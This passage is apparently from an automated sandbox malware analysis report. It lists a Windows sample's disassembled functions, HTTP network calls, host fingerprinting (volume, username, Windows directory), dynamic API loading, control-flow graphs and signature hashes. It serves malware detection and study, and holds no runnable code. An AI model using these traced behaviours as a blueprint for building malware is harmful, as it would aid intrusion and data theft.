                                    • InternetOpenA.WININET(001B0DFF,00000001,00000000,00000000,00000000), ref: 00196331
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00196385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 001963D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0019640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00196421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0019644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001964BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0019653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00196549
                                    • InternetCloseHandle.WININET(00000000), ref: 00196553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: e7d073c3877c9b14c1bd883f82d836827eedd623f16f0e46fa57878b3ab87ace
                                    • Instruction ID: f8fa205917f9520c9ac999ef2e8b7558433401f47195155df94b7861d5449e04
                                    • Opcode Fuzzy Hash: e7d073c3877c9b14c1bd883f82d836827eedd623f16f0e46fa57878b3ab87ace
                                    • Instruction Fuzzy Hash: 47714C75A00218EBDF24DFA0CC59BEE7778BF55700F5081A9F10A6B194DBB46A84CF61
                                    Function 001A7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 1a7690-1a76da GetWindowsDirectoryA 1357 1a76dc 1356->1357 1358 1a76e3-1a7757 GetVolumeInformationA call 1a8e90 * 3 1356->1358 1357->1358 1365 1a7768-1a776f 1358->1365 1366 1a778c-1a77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 1a7771-1a778a call 1a8e90 1365->1367 1369 1a77b8-1a77e8 wsprintfA call 1aaa50 1366->1369 1370 1a77a9-1a77b6 call 1aaa50 1366->1370 1367->1365 1377 1a780e-1a781e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001A76D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001A770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A779A
                                    • wsprintfA.USER32 ref: 001A77D0
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: aa2c8893c575c618d0918af9162daa2acfddea06f3524128ff5c5a2b463be2b9
                                    • Instruction ID: 7216b04ab98fe0b943b7461f8edbd50982ee102fc2b6004c87fc29eab367cff1
                                    • Opcode Fuzzy Hash: aa2c8893c575c618d0918af9162daa2acfddea06f3524128ff5c5a2b463be2b9
                                    • Instruction Fuzzy Hash: 3B41D6B5D04348DBDB10DFA4DC85BDEBBB8AF19704F104099F609AB280E7746B44CBA5
                                    Function 001A79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001911B7), ref: 001A7A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001A7A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 5cf4bf21cbfb1dc011097c9a61b6b579f486bb21fcd84d30beda832003774476
                                    • Instruction ID: 5fa9bc4bf7418575154661a117b6cc143438bd47d240c35985142a4c57fe323f
                                    • Opcode Fuzzy Hash: 5cf4bf21cbfb1dc011097c9a61b6b579f486bb21fcd84d30beda832003774476
                                    • Instruction Fuzzy Hash: 22F04FB5948209EBC704DF98DD45BAEBBB8EB05B15F10026AF615A3680D7B515008BA1
                                    Function 00191160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: daf5bd354dd37d9d6c04449185268579560a03cad1fa7ba7b5b1b5d964426fa7
                                    • Instruction ID: 9fe134361d53ae2ed2de76c14646e9a24ba1d49ef471603c8e6506b4c3a087a2
                                    • Opcode Fuzzy Hash: daf5bd354dd37d9d6c04449185268579560a03cad1fa7ba7b5b1b5d964426fa7
                                    • Instruction Fuzzy Hash: 9BD05E7490430CABCB00DFE098496EDBB78BB09219F0005A5DD0562340EB705481CA6A
                                    Function 001A9F20 Relevance: 233.4, APIs: 112, Strings: 21, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 1a9f20-1a9f2a 634 1a9f30-1aa341 GetProcAddress * 43 633->634 635 1aa346-1aa3da LoadLibraryA * 8 633->635 634->635 636 1aa3dc-1aa451 GetProcAddress * 5 635->636 637 1aa456-1aa45d 635->637 636->637 638 1aa463-1aa521 GetProcAddress * 8 637->638 639 1aa526-1aa52d 637->639 638->639 640 1aa5a8-1aa5af 639->640 641 1aa52f-1aa5a3 GetProcAddress * 5 639->641 642 1aa647-1aa64e 640->642 643 1aa5b5-1aa642 GetProcAddress * 6 640->643 641->640 644 1aa72f-1aa736 642->644 645 1aa654-1aa72a GetProcAddress * 9 642->645 643->642 646 1aa738-1aa7ad GetProcAddress * 5 644->646 647 1aa7b2-1aa7b9 644->647 645->644 646->647 648 1aa7bb-1aa7e7 GetProcAddress * 2 647->648 649 1aa7ec-1aa7f3 647->649 648->649 650 1aa825-1aa82c 649->650 651 1aa7f5-1aa820 GetProcAddress * 2 649->651 652 1aa922-1aa929 650->652 653 1aa832-1aa91d GetProcAddress * 10 650->653 651->650 654 1aa92b-1aa988 GetProcAddress * 4 652->654 655 1aa98d-1aa994 652->655 653->652 654->655 656 1aa9ae-1aa9b5 655->656 657 1aa996-1aa9a9 GetProcAddress 655->657 658 1aaa18-1aaa19 656->658 659 1aa9b7-1aaa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E14F80), ref: 001A9F3D
                                    • GetProcAddress.KERNEL32(75900000,00E150C0), ref: 001A9F55
                                    • GetProcAddress.KERNEL32(75900000,00E294A0), ref: 001A9F6E
                                    • GetProcAddress.KERNEL32(75900000,00E294E8), ref: 001A9F86
                                    • GetProcAddress.KERNEL32(75900000,00E2D268), ref: 001A9F9E
                                    • GetProcAddress.KERNEL32(75900000,00E2D340), ref: 001A9FB7
                                    • GetProcAddress.KERNEL32(75900000,00E1AC70), ref: 001A9FCF
                                    • GetProcAddress.KERNEL32(75900000,00E2D4F0), ref: 001A9FE7
                                    • GetProcAddress.KERNEL32(75900000,00E2D4C0), ref: 001AA000
                                    • GetProcAddress.KERNEL32(75900000,00E2D238), ref: 001AA018
                                    • GetProcAddress.KERNEL32(75900000,00E2D280), ref: 001AA030
                                    • GetProcAddress.KERNEL32(75900000,00E14E00), ref: 001AA049
                                    • GetProcAddress.KERNEL32(75900000,00E14E20), ref: 001AA061
                                    • GetProcAddress.KERNEL32(75900000,00E14E40), ref: 001AA079
                                    • GetProcAddress.KERNEL32(75900000,00E14E60), ref: 001AA092
                                    • GetProcAddress.KERNEL32(75900000,00E2D2B0), ref: 001AA0AA
                                    • GetProcAddress.KERNEL32(75900000,00E2D310), ref: 001AA0C2
                                    • GetProcAddress.KERNEL32(75900000,00E1ACC0), ref: 001AA0DB
                                    • GetProcAddress.KERNEL32(75900000,00E14E80), ref: 001AA0F3
                                    • GetProcAddress.KERNEL32(75900000,00E2D3A0), ref: 001AA10B
                                    • GetProcAddress.KERNEL32(75900000,00E2D2E0), ref: 001AA124
                                    • GetProcAddress.KERNEL32(75900000,00E2D250), ref: 001AA13C
                                    • GetProcAddress.KERNEL32(75900000,00E2D3B8), ref: 001AA154
                                    • GetProcAddress.KERNEL32(75900000,00E14EA0), ref: 001AA16D
                                    • GetProcAddress.KERNEL32(75900000,00E2D328), ref: 001AA185
                                    • GetProcAddress.KERNEL32(75900000,00E2D460), ref: 001AA19D
                                    • GetProcAddress.KERNEL32(75900000,00E2D3D0), ref: 001AA1B6
                                    • GetProcAddress.KERNEL32(75900000,00E2D2C8), ref: 001AA1CE
                                    • GetProcAddress.KERNEL32(75900000,00E2D3E8), ref: 001AA1E6
                                    • GetProcAddress.KERNEL32(75900000,00E2D298), ref: 001AA1FF
                                    • GetProcAddress.KERNEL32(75900000,00E2D358), ref: 001AA217
                                    • GetProcAddress.KERNEL32(75900000,00E2D388), ref: 001AA22F
                                    • GetProcAddress.KERNEL32(75900000,00E2D400), ref: 001AA248
                                    • GetProcAddress.KERNEL32(75900000,00E2AA78), ref: 001AA260
                                    • GetProcAddress.KERNEL32(75900000,00E2D418), ref: 001AA278
                                    • GetProcAddress.KERNEL32(75900000,00E2D430), ref: 001AA291
                                    • GetProcAddress.KERNEL32(75900000,00E14EC0), ref: 001AA2A9
                                    • GetProcAddress.KERNEL32(75900000,00E2D2F8), ref: 001AA2C1
                                    • GetProcAddress.KERNEL32(75900000,00E14FE0), ref: 001AA2DA
                                    • GetProcAddress.KERNEL32(75900000,00E2D4D8), ref: 001AA2F2
                                    • GetProcAddress.KERNEL32(75900000,00E2D448), ref: 001AA30A
                                    • GetProcAddress.KERNEL32(75900000,00E15000), ref: 001AA323
                                    • GetProcAddress.KERNEL32(75900000,00E15020), ref: 001AA33B
                                    • LoadLibraryA.KERNEL32(00E2D478,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA34D
                                    • LoadLibraryA.KERNEL32(00E2D490,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA35E
                                    • LoadLibraryA.KERNEL32(00E2D370,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA370
                                    • LoadLibraryA.KERNEL32(00E2D4A8,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA382
                                    • LoadLibraryA.KERNEL32(00E2D508,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA393
                                    • LoadLibraryA.KERNEL32(00E2D220,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA3A5
                                    • LoadLibraryA.KERNEL32(00E2D550,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA3B7
                                    • LoadLibraryA.KERNEL32(00E2D5E0,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA3C8
                                    • GetProcAddress.KERNEL32(75FD0000,00E15280), ref: 001AA3EA
                                    • GetProcAddress.KERNEL32(75FD0000,00E2D640), ref: 001AA402
                                    • GetProcAddress.KERNEL32(75FD0000,00E29140), ref: 001AA41A
                                    • GetProcAddress.KERNEL32(75FD0000,00E2D520), ref: 001AA433
                                    • GetProcAddress.KERNEL32(75FD0000,00E15420), ref: 001AA44B
                                    • GetProcAddress.KERNEL32(73B30000,00E1AD88), ref: 001AA470
                                    • GetProcAddress.KERNEL32(73B30000,00E15340), ref: 001AA489
                                    • GetProcAddress.KERNEL32(73B30000,00E1AA40), ref: 001AA4A1
                                    • GetProcAddress.KERNEL32(73B30000,00E2D5B0), ref: 001AA4B9
                                    • GetProcAddress.KERNEL32(73B30000,00E2D688), ref: 001AA4D2
                                    • GetProcAddress.KERNEL32(73B30000,00E15540), ref: 001AA4EA
                                    • GetProcAddress.KERNEL32(73B30000,00E15200), ref: 001AA502
                                    • GetProcAddress.KERNEL32(73B30000,00E2D6B8), ref: 001AA51B
                                    • GetProcAddress.KERNEL32(763B0000,00E153E0), ref: 001AA53C
                                    • GetProcAddress.KERNEL32(763B0000,00E15480), ref: 001AA554
                                    • GetProcAddress.KERNEL32(763B0000,00E2D5F8), ref: 001AA56D
                                    • GetProcAddress.KERNEL32(763B0000,00E2D538), ref: 001AA585
                                    • GetProcAddress.KERNEL32(763B0000,00E154C0), ref: 001AA59D
                                    • GetProcAddress.KERNEL32(750F0000,00E1AB80), ref: 001AA5C3
                                    • GetProcAddress.KERNEL32(750F0000,00E1ACE8), ref: 001AA5DB
                                    • GetProcAddress.KERNEL32(750F0000,00E2D6A0), ref: 001AA5F3
                                    • GetProcAddress.KERNEL32(750F0000,00E15260), ref: 001AA60C
                                    • GetProcAddress.KERNEL32(750F0000,00E15320), ref: 001AA624
                                    • GetProcAddress.KERNEL32(750F0000,00E1ABA8), ref: 001AA63C
                                    • GetProcAddress.KERNEL32(75A50000,00E2D568), ref: 001AA662
                                    • GetProcAddress.KERNEL32(75A50000,00E153C0), ref: 001AA67A
                                    • GetProcAddress.KERNEL32(75A50000,00E29250), ref: 001AA692
                                    • GetProcAddress.KERNEL32(75A50000,00E2D5C8), ref: 001AA6AB
                                    • GetProcAddress.KERNEL32(75A50000,00E2D580), ref: 001AA6C3
                                    • GetProcAddress.KERNEL32(75A50000,00E151A0), ref: 001AA6DB
                                    • GetProcAddress.KERNEL32(75A50000,00E15240), ref: 001AA6F4
                                    • GetProcAddress.KERNEL32(75A50000,00E2D6D0), ref: 001AA70C
                                    • GetProcAddress.KERNEL32(75A50000,00E2D610), ref: 001AA724
                                    • GetProcAddress.KERNEL32(75070000,00E15300), ref: 001AA746
                                    • GetProcAddress.KERNEL32(75070000,00E2D658), ref: 001AA75E
                                    • GetProcAddress.KERNEL32(75070000,00E2D598), ref: 001AA776
                                    • GetProcAddress.KERNEL32(75070000,00E2D628), ref: 001AA78F
                                    • GetProcAddress.KERNEL32(75070000,00E2D670), ref: 001AA7A7
                                    • GetProcAddress.KERNEL32(74E50000,00E15520), ref: 001AA7C8
                                    • GetProcAddress.KERNEL32(74E50000,00E15380), ref: 001AA7E1
                                    • GetProcAddress.KERNEL32(75320000,00E151C0), ref: 001AA802
                                    • GetProcAddress.KERNEL32(75320000,00E2CF98), ref: 001AA81A
                                    • GetProcAddress.KERNEL32(6F060000,00E15360), ref: 001AA840
                                    • GetProcAddress.KERNEL32(6F060000,00E152A0), ref: 001AA858
                                    • GetProcAddress.KERNEL32(6F060000,00E15400), ref: 001AA870
                                    • GetProcAddress.KERNEL32(6F060000,00E2D028), ref: 001AA889
                                    • GetProcAddress.KERNEL32(6F060000,00E153A0), ref: 001AA8A1
                                    • GetProcAddress.KERNEL32(6F060000,00E151E0), ref: 001AA8B9
                                    • GetProcAddress.KERNEL32(6F060000,00E15440), ref: 001AA8D2
                                    • GetProcAddress.KERNEL32(6F060000,00E15220), ref: 001AA8EA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 001AA901
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 001AA917
                                    • GetProcAddress.KERNEL32(74E00000,00E2D190), ref: 001AA939
                                    • GetProcAddress.KERNEL32(74E00000,00E291F0), ref: 001AA951
                                    • GetProcAddress.KERNEL32(74E00000,00E2CFC8), ref: 001AA969
                                    • GetProcAddress.KERNEL32(74E00000,00E2D148), ref: 001AA982
                                    • GetProcAddress.KERNEL32(74DF0000,00E152E0), ref: 001AA9A3
                                    • GetProcAddress.KERNEL32(6F9C0000,00E2D100), ref: 001AA9C4
                                    • GetProcAddress.KERNEL32(6F9C0000,00E15460), ref: 001AA9DD
                                    • GetProcAddress.KERNEL32(6F9C0000,00E2CFB0), ref: 001AA9F5
                                    • GetProcAddress.KERNEL32(6F9C0000,00E2D088), ref: 001AAA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: N$ P$ R$ S$ T$ U$@N$@R$@S$@T$@U$HttpQueryInfoA$InternetSetOptionA$`N$`R$`S$`T$O$Q$R$S
                                    • API String ID: 2238633743-2076794032
                                    • Opcode ID: 8f1cb4d0c5b88cc27ad3014067ae4659a5ce6de72b8865f75f2cf17bfa8927e5
                                    • Instruction ID: 70d73d7f58904c9b4fcdeea591682b138d85e57cc6b36341d1ab8d3482cf9bb2
                                    • Opcode Fuzzy Hash: 8f1cb4d0c5b88cc27ad3014067ae4659a5ce6de72b8865f75f2cf17bfa8927e5
                                    • Instruction Fuzzy Hash: 846232B55182009FC344DFA8EC989967BB9B74E709311867BF909C3370FBB59940CB6A
                                    Function 001948D0 Relevance: 32.0, APIs: 11, Strings: 7, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 1948d0-194992 call 1aaab0 call 194800 call 1aaa50 * 5 InternetOpenA StrCmpCA 816 19499b-19499f 801->816 817 194994 801->817 818 194f1b-194f43 InternetCloseHandle call 1aade0 call 19a210 816->818 819 1949a5-194b1d call 1a8cf0 call 1aac30 call 1aabb0 call 1aab10 * 2 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aac30 call 1aabb0 call 1aab10 * 2 InternetConnectA 816->819 817->816 829 194f82-194ff2 call 1a8b20 * 2 call 1aaab0 call 1aab10 * 8 818->829 830 194f45-194f7d call 1aab30 call 1aacc0 call 1aabb0 call 1aab10 818->830 819->818 905 194b23-194b27 819->905 830->829 906 194b29-194b33 905->906 907 194b35 905->907 908 194b3f-194b72 HttpOpenRequestA 906->908 907->908 909 194b78-194e78 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aaa50 call 1aac30 * 2 call 1aabb0 call 1aab10 * 2 call 1aade0 lstrlen call 1aade0 * 2 lstrlen call 1aade0 HttpSendRequestA 908->909 910 194f0e-194f15 InternetCloseHandle 908->910 1021 194e82-194eac InternetReadFile 909->1021 910->818 1022 194eae-194eb5 1021->1022 1023 194eb7-194f09 InternetCloseHandle call 1aab10 1021->1023 1022->1023 1024 194eb9-194ef7 call 1aacc0 call 1aabb0 call 1aab10 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00194965
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 0019498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00194B0A
